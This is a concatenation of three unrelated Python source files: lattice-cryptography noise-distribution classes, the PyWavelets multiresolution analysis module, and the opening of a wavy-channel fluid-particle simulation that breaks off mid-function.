        :param h: exactly :math:`h` components are :math:`\in [a,…,b]\setminus\{0\}`, all other components are zero
        :param uniform_mod_q: uniform mod q, if True no other value must be specified, if True, q must be set
        :param q: only needed for uniform_mod_q
        :param dimension: dimension of the distribution; can also be supplied later to the conversion methods
        """
        if (not a and not uniform_mod_q) or (a and uniform_mod_q):
            raise ValueError("Either a must have a value or uniform must be True.")
        self.uniform_mod_q = uniform_mod_q
        if not uniform_mod_q:
            if b is None:
                # Single bound a means the symmetric range [-a, a]
                b = a
                a = -a
            self.range = (a, b)
            self.h = h
        else:
            if q is None:
                raise ValueError(
                    "q must be set for uniform_mod_q uniform distribution."
                )
            else:
                self.range = (0, q)
        self.dimension = dimension

    def _resolve_dimension(self, dimension):
        """Return *dimension* or fall back to the instance's; raise if neither is set."""
        if dimension is None:
            dimension = self.dimension
        if dimension is None:
            raise ValueError(
                "Dimension must be specified as the object has not be initialized with dimension."
            )
        return dimension

    def _abs_bound(self):
        r"""Return the bound :math:`\max(|a|, |b|)` of the range."""
        return max(abs(self.range[0]), abs(self.range[1]))

    def get_alpha(self, q, n=None):
        r"""
        Calculates noise rate :math:`\alpha` of approximately equivalent discrete Gaussian distribution.

        :param q: modulus
        :param n: secret dimension, only needed for uniform mod q and sparse secrets
        :returns: noise rate :math:`\alpha`
        """
        if n is None:
            n = self._resolve_dimension(None)
        variance = est.SDis.variance(self._convert_for_lwe_estimator(), q=q, n=n)
        return est.alphaf(sqrt(variance), q, sigma_is_stddev=True)

    def get_range(self):
        """Return the ``(lower, upper)`` bound tuple of the distribution."""
        return self.range

    def _convert_for_lwe_estimator(self):
        """Convert uniform distribution into the format accepted by the lwe-estimator."""
        if self.uniform_mod_q:
            return "uniform"
        elif self.h:
            return (self.range, self.h)
        else:
            return self.range

    def to_L1(self, dimension=None):
        r"""
        Convert bound (maximum of :math:`(|a|, |b|)`) to :math:`\ell_1`-norm.

        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        """
        dimension = self._resolve_dimension(dimension)
        return norm.Lp(value=self._abs_bound(), p=oo, dimension=dimension).to_L1()

    def to_L2(self, dimension=None):
        r"""
        Convert bound (maximum of :math:`(|a|, |b|)`) to :math:`\ell_2`-norm.

        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        """
        dimension = self._resolve_dimension(dimension)
        return norm.Lp(value=self._abs_bound(), p=oo, dimension=dimension).to_L2()

    def to_Loo(self, dimension=None):
        r"""
        Convert bound (maximum of :math:`(|a|, |b|)`) to :math:`\ell_\infty`-norm.

        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        """
        dimension = self._resolve_dimension(dimension)
        return norm.Lp(value=self._abs_bound(), p=oo, dimension=dimension)

    def to_Coo(self, dimension=None):
        r"""
        Convert bound (maximum of :math:`(|a|, |b|)`) to :math:`\mathcal{C}_\infty`-norm.

        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        """
        dimension = self._resolve_dimension(dimension)
        return norm.Lp(value=self._abs_bound(), p=oo, dimension=dimension).to_Coo()

    def __str__(self) -> str:
        return "Uniform [" + str(self._convert_for_lwe_estimator()) + "]"
class Gaussian(norm.BaseNorm, ABC, Distribution):
    r"""
    Gaussian distribution.

    Includes various constructors (in subclasses) :class:`GaussianS` for Gaussian width parameter :math:`s = \sigma \cdot \sqrt{2\pi}`, :class:`GaussianSigma` for standard deviation :math:`\sigma` and :class:`GaussianAlpha` for :math:`\alpha = s / q`. Gaussian can be converted to bounds in various norms with statistical security parameter ``sec``.
    """

    @abstractmethod
    def __init__(self):
        pass

    def _resolve_sec(self, sec):
        """Return *sec* or fall back to the instance default; raise if neither is set."""
        if sec is None:
            if self.sec:
                sec = self.sec
            else:
                raise ValueError("sec parameter must be specified")
        return sec

    def _resolve_dimension(self, dimension):
        """Return *dimension* or fall back to the instance default; raise if neither is set."""
        if dimension is None:
            dimension = self.dimension
        if dimension is None:
            raise ValueError(
                "Dimension must be specified as the object has not be initialized with a dimension."
            )
        return dimension

    def get_alpha(self, q=None, n=None):
        r"""
        :param q: modulus, only used when alpha was not set at construction
        :param n: unused, kept for interface compatibility
        :returns: noise rate :math:`\alpha = s / q`
        """
        if self.alpha is not None:
            return self.alpha
        else:
            return est.alphaf(self.s, q, sigma_is_stddev=False)

    def get_stddev(self):
        r"""
        :returns: standard deviation :math:`\sigma`
        """
        return self.sigma

    def get_s(self):
        r"""
        :returns: Gaussian width parameter :math:`s = \sigma \cdot \sqrt{2\pi}`
        """
        return self.s

    def to_Lp(self, sec=None, dimension=None):
        r"""
        Transforms a Gaussian width into :math:`\ell_p`-norm of a vector whose coefficients are distributed according to a Gaussian.

        .. _to_Lp:

        The following is based on :cite:`Lyu12`.
        Given a Gaussian distribution :math:`D_{\mathbb{Z}^n, s}` with width parameter :math:`s = \sqrt{2 \pi} \sigma` and a security parameter :math:`\texttt{sec}`, we can compute a bound :math:`\beta` such that a sample :math:`\mathbf{v}` drawn from :math:`D_{\mathbb{Z}^n, s}` satisfies :math:`\text{Pr}\left[ \|\mathbf{v}\|_\infty \geq \beta \right] \leq 2^{-\texttt{sec}}` as follows:

        .. math::
            \beta = s \sqrt{\frac{(\texttt{sec} + 1) \ln(2)}{\pi}}.

        :param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        :returns: upper bound of the :math:`\ell_\infty`-norm of the vector
        """
        sec = self._resolve_sec(sec)
        dimension = self._resolve_dimension(dimension)
        bound = self.s * sqrt(log(2.0) * (sec + 1) / pi)
        return norm.Lp(value=bound, p=oo, dimension=dimension)

    def to_L1(self, sec=None, dimension=None):
        r"""
        Transforms a Gaussian width into the :math:`\ell_1`-norm of a vector whose coefficients are distributed according to a Gaussian (see `to_Lp`_).

        :param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        :returns: upper bound of :math:`\ell_1`-norm of vector
        """
        return self.to_Lp(sec=sec, dimension=dimension).to_L1(dimension=dimension)

    def to_L2(self, sec=None, dimension=None):
        r"""
        Transforms a Gaussian width into the :math:`\ell_2`-norm of a vector whose coefficients are distributed according to an :math:`n`-dimensional Gaussian.

        We have that :math:`\text{Pr}\left[ \|X\|_2 > k\sigma \sqrt{n} \right] \leq k^n e^{\frac{n}{2}(1-k^2)}`, for an :math:`n`-dimensional Gaussian :math:`D_{\mathbb{Z}^n, s}` and a random variable :math:`X` with :math:`X \sim D_{\mathbb{Z}^n, s}`, for any :math:`k>1` :cite:`Lyu12`. With :math:`k=\sqrt{2}` the failure probability is :math:`2^{\frac{n}{2}(1 -\log e)}`. If that is at most :math:`2^{-\texttt{sec}}`, we take :math:`\sigma \sqrt{2n}` as our bound; otherwise we fall back to the :math:`\ell_\infty`-based bound (see `to_Lp`_).

        :param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        :returns: upper bound of :math:`\ell_2`-norm of vector
        """
        sec = self._resolve_sec(sec)
        dimension = self._resolve_dimension(dimension)
        if 2 ** (dimension / 2 * (1 - log(e, 2))) <= 2 ** (-sec):
            bound = self.sigma * sqrt(2 * dimension)
            return norm.Lp(value=bound, p=2, dimension=dimension)
        else:
            return self.to_Lp(sec=sec, dimension=dimension).to_L2(dimension=dimension)

    def to_Loo(self, sec=None, dimension=None):
        r"""
        Transforms a Gaussian width into the :math:`\ell_\infty`-norm of a vector whose coefficients are distributed according to a Gaussian (see `to_Lp`_).

        :param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        :returns: upper bound of :math:`\ell_\infty`-norm of vector
        """
        return self.to_Lp(sec=sec, dimension=dimension).to_Loo(dimension=dimension)

    def to_Coo(self, sec=None, dimension=None):
        r"""
        Transforms a Gaussian width into the :math:`\mathcal{C}_\infty`-norm of a vector whose coefficients are distributed according to a Gaussian (see `to_Lp`_).

        :param sec: required security for statistical Gaussian to :math:`\ell_p`-bound conversion
        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        :returns: upper bound of :math:`\mathcal{C}_\infty`-norm of vector
        """
        return self.to_Lp(sec=sec, dimension=dimension).to_Coo(dimension=dimension)

    def _convert_for_lwe_estimator(self):
        """
        For secret distribution, implies that secret distribution follows error distribution (others not supported)
        """
        return "normal"

    def __str__(self) -> str:
        # BUG FIX: the closing bracket was missing.
        return f"Gaussian [sigma={self.sigma}, s={self.s}, alpha={self.alpha}, sec={self.sec}]"
class GaussianAlpha(Gaussian):
    r"""
    Helper class for a Gaussian distribution with input parameter :math:`\alpha`.
    """
    def __init__(self, alpha, q, sec=None, dimension=None):
        r"""
        :param alpha: noise rate :math:`\alpha`
        :param q: modulus
        :param sec: required security for statistical Gaussian to Lp-bound transformation
        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        """
        # Derive the standard deviation and the width parameter from alpha and q.
        self.alpha = alpha
        self.sigma = alpha_to_stddevf(self.alpha, q)
        self.s = est.sigmaf(self.sigma)
        self.sec = sec
        self.dimension = dimension
class GaussianSigma(Gaussian):
    r"""
    Helper class for a Gaussian distribution with input parameter :math:`\sigma` (standard deviation).
    """
    def __init__(self, sigma, q=None, sec=None, dimension=None):
        r"""
        :param sigma: standard deviation :math:`\sigma`
        :param q: modulus, optional; needed to derive the noise rate :math:`\alpha`
        :param sec: required security for statistical Gaussian to Lp-bound transformation
        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        """
        self.sigma = sigma
        self.s = est.sigmaf(self.sigma)
        # alpha can only be computed when the modulus is known.
        if q is not None:
            self.alpha = est.alphaf(self.sigma, q, sigma_is_stddev=True)
        else:
            self.alpha = None
        self.q = q
        self.sec = sec
        self.dimension = dimension
class GaussianS(Gaussian):
    r"""
    Helper class for a Gaussian distribution with input parameter :math:`s = \sigma \cdot \sqrt{2\pi}` where :math:`\sigma` is the standard deviation.
    """
    def __init__(self, s, q=None, sec=None, dimension=None):
        r"""
        :param s: Gaussian width :math:`s = \sigma \cdot \sqrt{2\pi}`
        :param q: modulus, optional; needed to derive the noise rate :math:`\alpha`
        :param sec: required security for statistical Gaussian to Lp-bound transformation
        :param dimension: dimension, note that for RLWE and MLWE the dimension has to be multiplied by the degree of the polynomial ``n``
        """
        self.s = s
        self.sigma = est.stddevf(self.s)
        # alpha can only be computed when the modulus is known.
        if q is not None:
            self.alpha = est.alphaf(s, q)
        else:
            self.alpha = None
        self.q = q
        self.sec = sec
        self.dimension = dimension
|
<filename>pywt/_mra.py
from functools import partial, reduce
import numpy as np
from ._multilevel import (_prep_axes_wavedecn, wavedec, wavedec2, wavedecn,
waverec, waverec2, waverecn)
from ._swt import iswt, iswt2, iswtn, swt, swt2, swt_max_level, swtn
from ._utils import _modes_per_axis, _wavelets_per_axis
__all__ = ["mra", "mra2", "mran", "imra", "imra2", "imran"]
def mra(data, wavelet, level=None, axis=-1, transform='swt',
        mode='periodization'):
    """Forward 1D multiresolution analysis.

    It is a projection onto the wavelet subspaces.

    Parameters
    ----------
    data: array_like
        Input data
    wavelet : Wavelet object or name string
        Wavelet to use
    level : int, optional
        Decomposition level (must be >= 0). If level is None (default) then it
        will be calculated using the `dwt_max_level` function.
    axis: int, optional
        Axis over which to compute the DWT. If not given, the last axis is
        used. Currently only available when ``transform='dwt'``.
    transform : {'dwt', 'swt'}
        Whether to use the DWT or SWT for the transforms.
    mode : str, optional
        Signal extension mode, see `Modes` (default: 'symmetric'). This option
        is only used when transform='dwt'.

    Returns
    -------
    [cAn, {details_level_n}, ... {details_level_1}] : list
        For more information, see the detailed description in `wavedec`

    See Also
    --------
    imra, swt

    Notes
    -----
    This is sometimes referred to as an additive decomposition because the
    inverse transform (``imra``) is just the sum of the coefficient arrays
    [1]_. The decomposition using ``transform='dwt'`` corresponds to section
    2.2 while that using an undecimated transform (``transform='swt'``) is
    described in section 3.2 and appendix A.

    This transform does not share the variance partition property of ``swt``
    with `norm=True`. It does however, result in coefficients that are
    temporally aligned regardless of the symmetry of the wavelet used.

    The redundancy of this transform is ``(level + 1)``.

    References
    ----------
    .. [1] <NAME> and <NAME>. Analysis of Subtidal
       Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
       Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
       https://doi.org/10.2307/2965551
    """
    if transform == 'swt':
        if mode != 'periodization':
            raise ValueError(
                "transform swt only supports mode='periodization'")
        common = dict(wavelet=wavelet, axis=axis, norm=True)
        forward = partial(swt, level=level, trim_approx=True, **common)
        inverse = partial(iswt, **common)
        undecimated = True
    elif transform == 'dwt':
        common = dict(wavelet=wavelet, mode=mode, axis=axis)
        forward = partial(wavedec, level=level, **common)
        inverse = partial(waverec, **common)
        undecimated = False
    else:
        raise ValueError("unrecognized transform: {}".format(transform))

    coeffs = forward(data)
    n_coeffs = len(coeffs)
    if undecimated:
        # All SWT coefficient arrays share one shape, so a single zeros array
        # can be replicated to save memory.
        zeros = np.zeros_like(coeffs[0])
        scratch = [zeros] * n_coeffs
    else:
        # DWT coefficient arrays have variable size per level.
        scratch = [np.zeros_like(c) for c in coeffs]

    projections = []
    for pos in range(n_coeffs):
        # scratch holds zeros everywhere except at position ``pos``
        scratch[pos] = coeffs[pos]
        # reconstruct the projection onto this single subspace
        recon = inverse(scratch)
        if recon.shape != data.shape:
            # trim any excess coefficients
            recon = recon[tuple(slice(sz) for sz in data.shape)]
        projections.append(recon)
        # restore zeros at this position for the next iteration
        if undecimated:
            scratch[pos] = zeros
        else:
            scratch[pos] = np.zeros_like(scratch[pos])
    return projections
def imra(mra_coeffs):
    """Inverse 1D multiresolution analysis via summation.

    Parameters
    ----------
    mra_coeffs : list of ndarray
        Multiresolution analysis coefficients as returned by `mra`.

    Returns
    -------
    rec : ndarray
        The reconstructed signal (the element-wise sum of all coefficient
        arrays).

    See Also
    --------
    mra

    References
    ----------
    .. [1] <NAME> and <NAME>. Analysis of Subtidal
       Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
       Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
       https://doi.org/10.2307/2965551
    """
    def _add(left, right):
        return left + right
    return reduce(_add, mra_coeffs)
def mra2(data, wavelet, level=None, axes=(-2, -1), transform='swt2',
         mode='periodization'):
    """Forward 2D multiresolution analysis.

    It is a projection onto wavelet subspaces.

    Parameters
    ----------
    data: array_like
        Input data
    wavelet : Wavelet object or name string, or 2-tuple of wavelets
        Wavelet to use. This can also be a tuple containing a wavelet to
        apply along each axis in `axes`.
    level : int, optional
        Decomposition level (must be >= 0). If level is None (default) then it
        will be calculated using the `dwt_max_level` function.
    axes : 2-tuple of ints, optional
        Axes over which to compute the DWT. Repeated elements are not allowed.
        Currently only available when ``transform='dwt2'``.
    transform : {'dwt2', 'swt2'}
        Whether to use the DWT or SWT for the transforms.
    mode : str or 2-tuple of str, optional
        Signal extension mode, see `Modes` (default: 'symmetric'). This option
        is only used when transform='dwt2'.

    Returns
    -------
    coeffs : list
        For more information, see the detailed description in `wavedec2`

    Notes
    -----
    This is sometimes referred to as an additive decomposition because the
    inverse transform (``imra2``) is just the sum of the coefficient arrays
    [1]_. The decomposition using ``transform='dwt'`` corresponds to section
    2.2 while that using an undecimated transform (``transform='swt'``) is
    described in section 3.2 and appendix A.

    This transform does not share the variance partition property of ``swt2``
    with `norm=True`. It does however, result in coefficients that are
    temporally aligned regardless of the symmetry of the wavelet used.

    The redundancy of this transform is ``3 * level + 1``.

    See Also
    --------
    imra2, swt2

    References
    ----------
    .. [1] <NAME> and <NAME>. Analysis of Subtidal
        Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
        Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
        https://doi.org/10.2307/2965551
    """
    if transform == 'swt2':
        # The stationary transform is only defined for periodization.
        if mode != 'periodization':
            raise ValueError(
                "transform swt only supports mode='periodization'")
        if level is None:
            level = min(swt_max_level(s) for s in data.shape)
        kwargs = dict(wavelet=wavelet, axes=axes, norm=True)
        forward = partial(swt2, level=level, trim_approx=True, **kwargs)
        inverse = partial(iswt2, **kwargs)
    elif transform == 'dwt2':
        kwargs = dict(wavelet=wavelet, mode=mode, axes=axes)
        forward = partial(wavedec2, level=level, **kwargs)
        inverse = partial(waverec2, **kwargs)
    else:
        raise ValueError("unrecognized transform: {}".format(transform))

    wav_coeffs = forward(data)

    mra_coeffs = []
    nc = len(wav_coeffs)

    # Approximation projection: zero out every detail subband, keep only
    # wav_coeffs[0], and run the inverse transform.
    z = np.zeros_like(wav_coeffs[0])
    tmp = [z]
    for j in range(1, nc):
        tmp.append([np.zeros_like(c) for c in wav_coeffs[j]])

    # tmp has arrays of zeros except for the jth entry
    tmp[0] = wav_coeffs[0]

    # reconstruct
    rec = inverse(tmp)
    if rec.shape != data.shape:
        # trim any excess coefficients
        rec = rec[tuple([slice(sz) for sz in data.shape])]
    mra_coeffs.append(rec)

    # restore zeros
    tmp[0] = z

    # Detail projections: one reconstruction per level ``j`` and per
    # detail orientation ``n`` (horizontal/vertical/diagonal), with only
    # that single subband non-zero.
    for j in range(1, nc):
        dcoeffs = []
        for n in range(3):
            # tmp has arrays of zeros except for the jth entry
            z = tmp[j][n]
            tmp[j][n] = wav_coeffs[j][n]
            # reconstruct
            rec = inverse(tmp)
            if rec.shape != data.shape:
                # trim any excess coefficients
                rec = rec[tuple([slice(sz) for sz in data.shape])]
            dcoeffs.append(rec)
            # restore zeros
            tmp[j][n] = z
        mra_coeffs.append(tuple(dcoeffs))
    return mra_coeffs
def imra2(mra_coeffs):
    """Inverse 2D multiresolution analysis via summation.

    Parameters
    ----------
    mra_coeffs : list
        Multiresolution analysis coefficients as returned by `mra2`.

    Returns
    -------
    rec : ndarray
        The reconstructed signal.

    See Also
    --------
    mra2

    References
    ----------
    .. [1] <NAME> and <NAME>. Analysis of Subtidal
        Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
        Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
        https://doi.org/10.2307/2965551
    """
    # Use out-of-place addition (``rec = rec + v``).  The previous in-place
    # ``rec += v`` silently modified the caller's approximation array
    # ``mra_coeffs[0]``, corrupting the input coefficients.
    rec = mra_coeffs[0]
    for j in range(1, len(mra_coeffs)):
        for n in range(3):
            rec = rec + mra_coeffs[j][n]
    return rec
def mran(data, wavelet, level=None, axes=None, transform='swtn',
         mode='periodization'):
    """Forward nD multiresolution analysis.

    It is a projection onto the wavelet subspaces.

    Parameters
    ----------
    data: array_like
        Input data
    wavelet : Wavelet object or name string, or tuple of wavelets
        Wavelet to use. This can also be a tuple containing a wavelet to
        apply along each axis in `axes`.
    level : int, optional
        Decomposition level (must be >= 0). If level is None (default) then it
        will be calculated using the `dwt_max_level` function.
    axes : tuple of ints, optional
        Axes over which to compute the DWT. Repeated elements are not allowed.
    transform : {'dwtn', 'swtn'}
        Whether to use the DWT or SWT for the transforms.
    mode : str or tuple of str, optional
        Signal extension mode, see `Modes` (default: 'symmetric'). This option
        is only used when transform='dwtn'.

    Returns
    -------
    coeffs : list
        For more information, see the detailed description in `wavedecn`.

    See Also
    --------
    imran, swtn

    Notes
    -----
    This is sometimes referred to as an additive decomposition because the
    inverse transform (``imran``) is just the sum of the coefficient arrays
    [1]_. The decomposition using ``transform='dwt'`` corresponds to section
    2.2 while that using an undecimated transform (``transform='swt'``) is
    described in section 3.2 and appendix A.

    This transform does not share the variance partition property of ``swtn``
    with `norm=True`. It does however, result in coefficients that are
    temporally aligned regardless of the symmetry of the wavelet used.

    The redundancy of this transform is ``(2**n - 1) * level + 1`` where ``n``
    corresponds to the number of axes transformed.

    References
    ----------
    .. [1] <NAME> and <NAME>. Analysis of Subtidal
        Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
        Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
        https://doi.org/10.2307/2965551
    """
    axes, axes_shapes, ndim_transform = _prep_axes_wavedecn(data.shape, axes)
    wavelets = _wavelets_per_axis(wavelet, axes)
    if transform == 'swtn':
        # The stationary transform is only defined for periodization.
        if mode != 'periodization':
            raise ValueError(
                "transform swt only supports mode='periodization'")
        if level is None:
            level = min(swt_max_level(s) for s in data.shape)
        kwargs = dict(wavelet=wavelets, axes=axes, norm=True)
        forward = partial(swtn, level=level, trim_approx=True, **kwargs)
        inverse = partial(iswtn, **kwargs)
    elif transform == 'dwtn':
        modes = _modes_per_axis(mode, axes)
        kwargs = dict(wavelet=wavelets, mode=modes, axes=axes)
        forward = partial(wavedecn, level=level, **kwargs)
        inverse = partial(waverecn, **kwargs)
    else:
        raise ValueError("unrecognized transform: {}".format(transform))

    wav_coeffs = forward(data)

    mra_coeffs = []
    nc = len(wav_coeffs)

    # Approximation projection: zero out every detail dict, keep only
    # wav_coeffs[0], and run the inverse transform.
    z = np.zeros_like(wav_coeffs[0])
    tmp = [z]
    for j in range(1, nc):
        tmp.append({k: np.zeros_like(v) for k, v in wav_coeffs[j].items()})

    # tmp has arrays of zeros except for the jth entry
    tmp[0] = wav_coeffs[0]

    # reconstruct
    rec = inverse(tmp)
    if rec.shape != data.shape:
        # trim any excess coefficients
        rec = rec[tuple([slice(sz) for sz in data.shape])]
    mra_coeffs.append(rec)

    # restore zeros
    tmp[0] = z

    # Detail projections: one reconstruction per level ``j`` and per detail
    # subband key ``k``, with only that subband non-zero.
    for j in range(1, nc):
        dcoeffs = {}
        dkeys = list(wav_coeffs[j].keys())
        for k in dkeys:
            # tmp has arrays of zeros except for the jth entry
            z = tmp[j][k]
            tmp[j][k] = wav_coeffs[j][k]
            # tmp[j]['a' * len(k)] = z
            # reconstruct
            rec = inverse(tmp)
            if rec.shape != data.shape:
                # trim any excess coefficients
                rec = rec[tuple([slice(sz) for sz in data.shape])]
            dcoeffs[k] = rec
            # restore zeros
            tmp[j][k] = z
            # tmp[j].pop('a' * len(k))
        mra_coeffs.append(dcoeffs)
    return mra_coeffs
def imran(mra_coeffs):
    """Inverse nD multiresolution analysis via summation.

    Parameters
    ----------
    mra_coeffs : list
        Multiresolution analysis coefficients as returned by `mran`.

    Returns
    -------
    rec : ndarray
        The reconstructed signal.

    See Also
    --------
    mran

    References
    ----------
    .. [1] <NAME> and <NAME>. Analysis of Subtidal
        Coastal Sea Level Fluctuations Using Wavelets. Journal of the American
        Statistical Association Vol. 92, No. 439 (Sep., 1997), pp. 868-880.
        https://doi.org/10.2307/2965551
    """
    # Use out-of-place addition (``rec = rec + v``).  The previous in-place
    # ``rec += v`` silently modified the caller's approximation array
    # ``mra_coeffs[0]``.  Iterate ``.values()`` since the keys are unused.
    rec = mra_coeffs[0]
    for j in range(1, len(mra_coeffs)):
        for v in mra_coeffs[j].values():
            rec = rec + v
    return rec
|
import math
import numpy as np
from matplotlib import pyplot as plt
import root_finder
import random
import pylab
class ProblemParameters:
    """Geometric, kinematic and numerical parameters of the wavy-channel
    (fracture) flow problem, plus per-particle result storage.
    """

    def __init__(self):
        # --- Channel geometry ---
        self.L0 = 0.01   # channel wavelength
        self.H0 = 0.005  # mean channel aperture
        self.U0 = 0.31297739987328533717  # reference velocity scale
        self.epsilon = self.H0 / self.L0  # slenderness (aspect) ratio
        self.A1 = 0.001  # bottom-wall corrugation amplitude
        self.A2 = 0.001  # top-wall corrugation amplitude
        self.DeltaX = self.L0 / 2  # streamwise shift between the walls
        # --- Discretization / sampling sizes ---
        self.n_points = 1000     # samples along the wall curves
        self.n_streamlines = 12  # streamlines drawn in plots
        self.n_periods = 1       # wall periods per wavelength
        self.Omega = 2 * math.pi / self.L0 * self.n_periods  # wall wavenumber
        self.n_particles = 1000  # default particle count
        # --- Derived dimensionless groups ---
        self.delta_0 = (self.A1 + self.A2) / (2 * self.H0)
        self.alpha = 2 * math.pi * self.DeltaX / self.L0  # phase shift angle
        self.gamma = (self.A2 - self.A1) / (self.A2 + self.A1)
        self.cos_semi_alpha = math.cos(0.5 * self.alpha)
        self.sin_semi_alpha = math.sin(0.5 * self.alpha)
        # --- Containers filled later by GenerateRandomPositions and
        # GetFlowVariables ---
        self.eta_values = []
        self.randoms_horizontal = []
        self.randoms_vertical = []
        self.vels_horizontal = []
        self.vels_vertical = []
        self.accelerations_horizontal = []
        self.accelerations_vertical = []
        self.x_points = []
        self.phi_1 = []
        self.phi_2 = []
        # --- Shape-integral constants of the asymptotic solution ---
        self.delta_alpha = self.delta_0 * math.sin(self.alpha / 2)
        self.h3 = 8 * (1 + self.delta_alpha ** 2) / (1 - 4 * self.delta_alpha ** 2) ** 2.5
        self.J_h = 16 * math.pi ** 2 * self.delta_alpha ** 2 / (1 - 4 * self.delta_alpha ** 2) ** 1.5
        self.J_phi = 16 * math.pi ** 2 * (self.delta_0 ** 2 - self.delta_alpha ** 2) * (1 + 8 * self.delta_alpha ** 2) / (1 - 4 * self.delta_alpha ** 2) ** 2.5
        self.J_phi_h = self.gamma * self.J_h
        self.beta = self.J_phi_h / self.J_h
        # --- Plotting options ---
        self.plot_arrows = False

    def SetNonGeometricParameters(self, a, rho_p, rho_f, nu, gz):
        """Set particle/fluid properties and derive the dynamical groups.

        a: particle radius; rho_p / rho_f: particle and fluid densities;
        nu: kinematic viscosity; gz: gravitational acceleration.
        """
        self.a = a
        self.rho = rho_p / rho_f
        self.nu = nu
        self.R = 2.0 / (2 * self.rho + 1)  # density-ratio parameter
        self.tau = 2.0 / 9 * self.a ** 2 / self.nu / self.L0  # relaxation scale
        self.Fr = self.U0 ** 2 / (self.L0 * gz)  # Froude number
        self.Gz = 1. / self.Fr  # inverse Froude number
        self.gamma_z = 8. * self.Gz / (9 * self.epsilon * self.J_h)
        self.h_and_phi_function = h_and_phi_function(self)

    def PrintParameters(self):
        """Print the main dimensionless parameters to stdout."""
        print('tau = ', self.tau)
        print('R = ', self.R)
        print('epsilon = ', self.epsilon)
        print('delta_0 = ', self.delta_0)
        print('h3 = ', self.h3)
        print('J_h = ', self.J_h)
        # Fixed: J_phi was previously printed twice.
        print('J_phi = ', self.J_phi)
        print('J_phi_h = ', self.J_phi_h)
        print('beta = ', self.beta)
        print('gamma_z = ', self.gamma_z)
def Phi1(pp, X):
    """Return the bottom-wall elevation at streamwise position ``X``."""
    phase = pp.Omega * X - 0.5 * pp.alpha
    return pp.A1 * math.sin(phase) - 0.5 * pp.H0
def Phi2(pp, X):
    """Return the top-wall elevation at streamwise position ``X``."""
    phase = pp.Omega * X + 0.5 * pp.alpha
    return pp.A2 * math.sin(phase) + 0.5 * pp.H0
class HorizontalDistributionMinusObjective:
    """Residual of the normalized horizontal cumulative distribution.

    ``f(y)`` evaluates the normalized cumulative cross-section up to ``y``
    minus a target value ``x`` set via ``SetObjective``; ``df`` is its
    derivative.  A root finder drives ``f`` to zero to invert the CDF.
    """

    def __init__(self, pp, L0, H0, A1, A2, DeltaX):
        self.Omega = pp.Omega
        self.H0 = pp.H0
        self.DeltaX = DeltaX
        self.A1 = pp.A1
        self.A2 = pp.A2
        half_shift = 0.5 * DeltaX
        self.C_phase = (A2 - A1) * math.cos(half_shift)
        # Normalization constant: reciprocal of the full-period integral.
        full_period = H0 * L0 + 1.0 / pp.Omega * (
            A1 * math.cos(pp.Omega * L0 - half_shift)
            - A2 * math.cos(pp.Omega * L0 + half_shift)
            + self.C_phase)
        self.C = 1.0 / full_period

    def SetObjective(self, x):
        """Store the target CDF value ``x`` that ``f`` should match."""
        self.x = x

    def f(self, y):
        """Return the normalized CDF at ``y`` minus the stored objective."""
        half_shift = 0.5 * self.DeltaX
        integral = self.H0 * y + 1.0 / self.Omega * (
            self.A1 * math.cos(self.Omega * y - half_shift)
            - self.A2 * math.cos(self.Omega * y + half_shift)
            + self.C_phase)
        return self.C * integral - self.x

    def df(self, y):
        """Return the derivative of ``f`` with respect to ``y``."""
        half_shift = 0.5 * self.DeltaX
        return self.C * (self.H0
                         - self.A1 * math.sin(self.Omega * y - half_shift)
                         + self.A2 * math.sin(self.Omega * y + half_shift))
class h_and_phi_function:
    """Evaluate the wall shape functions ``phi(x)``, ``h(x)`` and their
    first three streamwise derivatives.

    The trigonometric coefficients are frozen from the problem parameters
    at construction time; ``x`` is the dimensionless streamwise coordinate.
    """

    def __init__(self, pp):
        self.Omega = pp.Omega
        self.L0 = pp.L0
        self.sin_semi_alpha = pp.sin_semi_alpha
        self.cos_semi_alpha = pp.cos_semi_alpha
        self.delta_0 = pp.delta_0
        self.gamma = pp.gamma
        self.OmegaL0 = self.Omega * self.L0

    def f(self, x):
        """Return (phi, phi', phi'', phi''', h, h', h'', h''') at ``x``."""
        k = self.OmegaL0
        c = math.cos(k * x)
        s = math.sin(k * x)
        # Recurring trig products: <c|s>_arg times cos/sin of alpha/2.
        sc = s * self.cos_semi_alpha
        cc = c * self.cos_semi_alpha
        ss = s * self.sin_semi_alpha
        cs = c * self.sin_semi_alpha
        g = self.gamma
        d0 = self.delta_0
        phi = d0 * (sc + g * cs)
        phidx = k * d0 * (cc - g * ss)
        phidx2 = k ** 2 * d0 * (-sc - g * cs)
        phidx3 = k ** 3 * d0 * (-cc + g * ss)
        h = 0.5 + d0 * (cs + g * sc)
        hdx = k * d0 * (-ss + g * cc)
        hdx2 = k ** 2 * d0 * (-cs - g * sc)
        hdx3 = k ** 3 * d0 * (ss - g * cc)
